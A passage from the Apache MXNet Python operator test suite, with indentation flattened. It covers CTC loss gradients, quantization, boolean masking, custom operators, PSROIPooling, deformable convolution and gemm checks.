assert_almost_equal(loss, expected_loss)
@with_seed()
def test_ctc_loss_grad():
def check_ctc_loss_grad(blank_label, contrib=False): # from tf
vocab_size = 5
max_label_len = 5
padding_mask = -1+ (blank_label=='first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
if contrib:
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
else:
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l, loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad, grad_truth, atol=1e-5, rtol=1e-5)
for contrib in [False, True]:
for label in ['first', 'last']:
check_ctc_loss_grad(label, contrib=contrib)
@with_seed()
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
print(a_.asnumpy())
print(a_real.asnumpy())
assert same(qa.asnumpy(), qa_real.asnumpy())
assert_almost_equal(a_.asnumpy(), a_real.asnumpy(), rtol=1e-2)
@with_seed()
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
@with_seed()
def test_boolean_mask():
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
# test 0-size output
mx.set_np_shape(True)
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 0, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.zeros((0, 3))
expected_grad = np.array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
mx.set_np_shape(False)
# test gradient
shape = (100, 30)
a = mx.nd.random.randint(0, 100, shape=shape)
a.attach_grad()
bi = mx.nd.random.randint(0, 100, shape=shape[0:1]) > 50
ci = mx.nd.random.randint(0, 100, shape=shape[0:1]) < 50
mx_grad = mx.nd.zeros_like(a)
mx.autograd.mark_variables([a], [mx_grad], grad_reqs='add')
T = 3
for _ in range(T):
with mx.autograd.record():
b = mx.nd.contrib.boolean_mask(a, bi)
c = mx.nd.contrib.boolean_mask(a, ci)
su = b.sum() + c.sum()
su.backward()
grad = (bi + ci).asnumpy().reshape((-1,) + (1,) * (len(shape)-1))
grad = np.tile(grad, (1,) + shape[1:])
# T times
grad *= T
assert_allclose(a.grad.asnumpy(), grad)
a_np = a.asnumpy()
assert same(b.asnumpy(), a_np[bi.asnumpy().astype('bool')])
assert same(c.asnumpy(), a_np[ci.asnumpy().astype('bool')])
@with_seed()
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
@with_seed()
def test_reciprocal_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 6 below set empirically, depends on eps.
# Issue exposed by seed 879579887.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 6*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
@with_seed()
def test_cbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid finite difference method inaccuracies due to infinite gradient at the origin.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 553872106.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=eps)
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
@with_seed()
def test_rcbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 788174893.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
@with_seed()
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output, expected_output, rtol=rtol, atol=atol)
assert_almost_equal(x2.grad, expected_grad, rtol=rtol, atol=atol)
# test for backward compatibility, i.e. the correctness of default implementation of
# infer storage in custom operator
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x, np.ones(shape=(10, 10), dtype=np.float32))
@unittest.skip("Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/17467")
@with_seed()
def test_custom_op_fork():
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
if not sys.platform.startswith('win'): # no fork in windows
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive() and p.exitcode == 0
def _build_dot_custom(fun_forward, name):
class Dot(mx.operator.CustomOp):
def __init__(self):
super(Dot, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
fun_forward(in_data, out_data)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register(name)
class DotProp(mx.operator.CustomOpProp):
def __init__(self):
super(DotProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [(in_shape[0][0], in_shape[1][1])]
def create_operator(self, ctx, shapes, dtypes):
return Dot()
@with_seed()
def test_custom_op_exc():
# test except handling
# see https://github.com/apache/incubator-mxnet/pull/14693
# 1. error in python code
def custom_exc1():
def f(in_data, out_data):
assert False
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot1')
a = mx.nd.zeros((4, 1))
b = mx.nd.zeros((1, 4))
c = mx.nd.Custom(a, b, op_type='Dot1')
c.wait_to_read()
assert_raises(MXNetError, custom_exc1)
# 2. error in pushing operator to engine
def custom_exc2():
def f(in_data, out_data):
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot2')
a = mx.nd.zeros((4, 2))
b = mx.nd.zeros((1, 4))
# trigger error by invalid input shapes of operands
c = mx.nd.Custom(a, b, op_type='Dot2')
c.wait_to_read()
assert_raises(MXNetError, custom_exc2)
# 3. error in real execution
if default_context().device_type == 'cpu':
def custom_exc3():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
out_data[0].wait_to_read()
_build_dot_custom(f, 'Dot3')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot3')
c.wait_to_read()
assert_raises(MXNetError, custom_exc3)
def custom_exc4():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
_build_dot_custom(f, 'Dot4')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot4')
c.wait_to_read()
assert_raises(MXNetError, custom_exc4)
@with_seed()
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
@with_seed()
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
def test_deformable_convolution():
for num_batch in [1, 2]:
for num_channel_data, num_deformable_group in itertools.product([4, 8], [1, 2]):
for input_height, input_width in itertools.product([5, 6], [5, 6]):
for dilate in [(1, 1), (2, 2)]:
for grad_nodes in [['im_data'], ['offset_data'], ['weight']]:
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
weight_var = mx.symbol.Variable(name="weight")
bias_var = mx.symbol.Variable(name="bias")
op = mx.sym.contrib.DeformableConvolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate deformable psroipooling forward function
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
# if the following condiiton holds, the sampling location is not differentiable
# therefore we need to re-do the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
@unittest.skip("Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
@with_seed()
def test_deformable_psroipooling():
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
stride = int(1 / spatial_scale)
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
# at certain points, the bilinear interpolation function may be non-differentiable
# to avoid this, we check whether the input locates on the valid points
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw = 1e-7, atol_fw = 1e-9):
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np.random.uniform(1, 10, shape1).astype(dtype)
data_in2 = np.random.uniform(1, 10, shape2).astype(dtype)
data_in3 = np.random.uniform(1, 10, shape3).astype(dtype)
data_in4 = np.random.uniform(1, 10, shape4).astype(dtype)
# Check all transpositions of gemm operator.
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
# Check for different axis that describes matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
